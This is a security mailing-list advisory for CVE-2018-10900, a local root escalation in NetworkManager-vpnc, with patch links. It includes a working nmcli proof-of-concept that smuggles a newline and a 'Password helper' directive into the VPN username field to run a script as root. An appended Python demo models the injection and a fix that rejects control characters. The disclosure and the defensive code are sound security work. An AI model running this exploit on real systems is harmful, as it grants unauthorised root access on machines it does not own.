List: oss-security
Subject: [oss-security] CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation
From: Lubomir Rintel <lkundrak () v3 ! sk>
Date: 2018-07-20 9:38:39
Message-ID: c3f99b35b65fa7d78317ca62f32046eab71596b9.camel () v3 ! sk
Hi,
NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug.
The bug was responsibly disclosed to us by Denis Andzakovic. Please
credit him if you issue an advisory for a product that ships the
affected code. His original advisory should be available soon at
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
CVE Number: CVE-2018-10900
Original Report (will be available soon):
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Patch:
https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4
Release Notes:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.news
Patched Version:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.tar.xz
The exploit code for QA and documentation purposes follows:
cat <<EOF >/tmp/helper
#!/bin/bash
id >/tmp/pwned
EOF
chmod +x /tmp/helper
nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \
+vpn.data "IKE DH Group = dh2" \
+vpn.data "IPSec ID = bar" \
+vpn.data "IPSec gateway = 127.0.0.1" \
+vpn.data "IPSec secret-flags = 4" \
+vpn.data "Local Port = 0" \
+vpn.data "NAT Traversal Mode = natt" \
+vpn.data "Perfect Forward Secrecy = server" \
+vpn.data "Vendor = cisco" \
+vpn.data "Xauth password-flags = 4" \
+vpn.data "Xauth username = foo$(echo; echo Password helper /tmp/helper)" \
+vpn.data "ipsec-secret-type = save" \
+vpn.data "xauth-password-type = save"
nmcli c up poc
$ cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:vpnc_t:s0
Take care,
Lubo
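The post above shows the root cause from the attacker's side: a newline inside the "Xauth username" connection property ends up as a second line in the configuration handed to the privileged vpnc helper, and that line is read as a "Password helper" directive. The following is an added example, not code from the original post or from NetworkManager-vpnc. It models a vpnc-style "Directive value" file with a small constructed writer and parser, shows the injected directive appearing in the parsed output, and then applies the kind of input check a defender wants in front of any writer that turns user-controlled strings into a line-oriented config. The directive names, the demo connection data and the parser are constructed for the demo and are not the project's implementation.

```python
from __future__ import annotations

# Directive names used by the demo, longest first so that prefix matching
# never confuses "IPSec ID" with a longer directive (constructed list).
KNOWN_DIRECTIVES = sorted(
    ["IPSec gateway", "IPSec ID", "Xauth username", "Password helper"],
    key=len, reverse=True,
)

# Constructed connection data mirroring the posted PoC: the username carries
# an embedded newline followed by a second directive.
DEMO_DATA = {
    "IPSec gateway": "127.0.0.1",
    "IPSec ID": "bar",
    "Xauth username": "foo\nPassword helper /tmp/helper",
}


def write_config_naive(data: dict[str, str]) -> str:
    """Trusting writer: one 'Directive value' line per entry, values unchecked."""
    return "".join(f"{key} {value}\n" for key, value in data.items())


def parse_config(text: str) -> list[tuple[str, str]]:
    """Line-oriented reader in the spirit of a 'Directive value' file (demo only)."""
    parsed: list[tuple[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        for directive in KNOWN_DIRECTIVES:
            if line == directive or line.startswith(directive + " "):
                parsed.append((directive, line[len(directive):].strip()))
                break
        else:
            parsed.append(("<unrecognised>", line))
    return parsed


def value_is_safe(value: str) -> bool:
    """Reject every ASCII control character.

    CR or LF would terminate the current line and start a new directive; the
    remaining control characters have no place in a username, group ID or
    gateway address either, so the check is a simple allow-nothing-below-0x20.
    """
    return not any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def write_config_checked(data: dict[str, str]) -> str:
    """Hardened writer: refuses to emit a file if any value fails the check."""
    for key, value in data.items():
        if not value_is_safe(value):
            raise ValueError(f"refusing to write {key!r}: value contains control characters")
    return write_config_naive(data)


def directives_written(writer, data: dict[str, str]) -> list[str]:
    """Directive names the reader would see after `writer` serialises `data`."""
    return [name for name, _ in parse_config(writer(data))]


def checked_writer_rejects(data: dict[str, str]) -> bool:
    """True if the hardened writer refuses the given connection data."""
    try:
        write_config_checked(data)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Three properties go in, four directives come out: the injected one is last.
    print(directives_written(write_config_naive, DEMO_DATA))
    print("checked writer rejects PoC data:", checked_writer_rejects(DEMO_DATA))
```

The same check belongs on every property that ends up in the file, not just the username; a D-Bus or nmcli client controls all of them, and any value is a place to smuggle in a line break.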